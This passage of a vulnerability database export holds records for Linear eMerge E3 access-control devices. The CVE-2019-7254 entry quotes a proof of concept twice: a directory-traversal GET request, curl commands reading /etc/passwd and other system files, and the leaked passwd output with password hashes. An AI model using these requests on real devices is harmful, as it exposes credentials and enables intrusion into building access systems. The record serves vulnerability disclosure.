        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7260"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "date": "2019-07-02T18:15:12.017000",
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "date": "2024-03-07T08:19:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "date": "2020-08-24T17:37:01.140000",
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to certificate/password management in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0155

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security & Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure Affected version: <=1.00-06 CVE: CVE-2019-7254 Advisory: https://applied-risk.com/resources/ar-2019-005

    by Gjoko 'LiquidWorm' Krstic

    GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2

    root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh

    curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0155",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "155252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2019-7254",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7254",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-158689",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-7254",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7254",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7254",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-114",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158689",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7254",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security \u0026 Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. \nLinear eMerge E3 Unauthenticated Directory Traversal File Disclosure\nAffected version: \u003c=1.00-06\nCVE: CVE-2019-7254\nAdvisory: https://applied-risk.com/resources/ar-2019-005\n\nby Gjoko \u0027LiquidWorm\u0027 Krstic\n\n\nGET /?c=../../../../../../etc/passwd%00\nHost: 192.168.1.2\n\nroot:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/home/ftp:\nnobody:x:99:99:Nobody:/home/default:\ne3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh\nlighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh\n\n\ncurl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd\ncurl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version\ncurl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue\ncurl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "PACKETSTORM",
            "id": "155252"
          }
        ],
        "trust": 1.89
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7254",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "155252",
            "trust": 1.9
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114",
            "trust": 0.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47618",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158689",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "PACKETSTORM",
            "id": "155252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "id": "VAR-201907-0155",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-03-18T22:23:59.333000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          },
          {
            "title": "Kenzer Templates [5170] [DEPRECATED]",
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.1
          },
          {
            "problemtype": "Authorization / authority / access control (CWE-264) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-264",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 1.9,
            "url": "http://packetstormsecurity.com/files/155252/linear-emerge-e3-1.00-06-directory-traversal.html"
          },
          {
            "trust": 1.8,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7254"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47618"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/22.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.2/?c=../../../../../../etc/passwd%00"
          },
          {
            "trust": 0.1,
            "url": "https://applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "PACKETSTORM",
            "id": "155252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "db": "PACKETSTORM",
            "id": "155252"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "date": "2019-11-12T17:07:24",
            "db": "PACKETSTORM",
            "id": "155252"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "date": "2019-07-02T19:15:11.007000",
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158689"
          },
          {
            "date": "2021-10-04T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7254"
          },
          {
            "date": "2024-03-07T07:18:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          },
          {
            "date": "2021-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          },
          {
            "date": "2021-10-04T17:15:57.257000",
            "db": "NVD",
            "id": "CVE-2019-7254"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to authorization, privileges, and access control in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006012"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-114"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0160

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Authorization Bypass with Information Disclosure. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA. An attacker can use the GET request to exploit the vulnerability to bypass authorization, obtain management credentials, log in again with admin permissions, and gain full access to the control interface

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0160",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
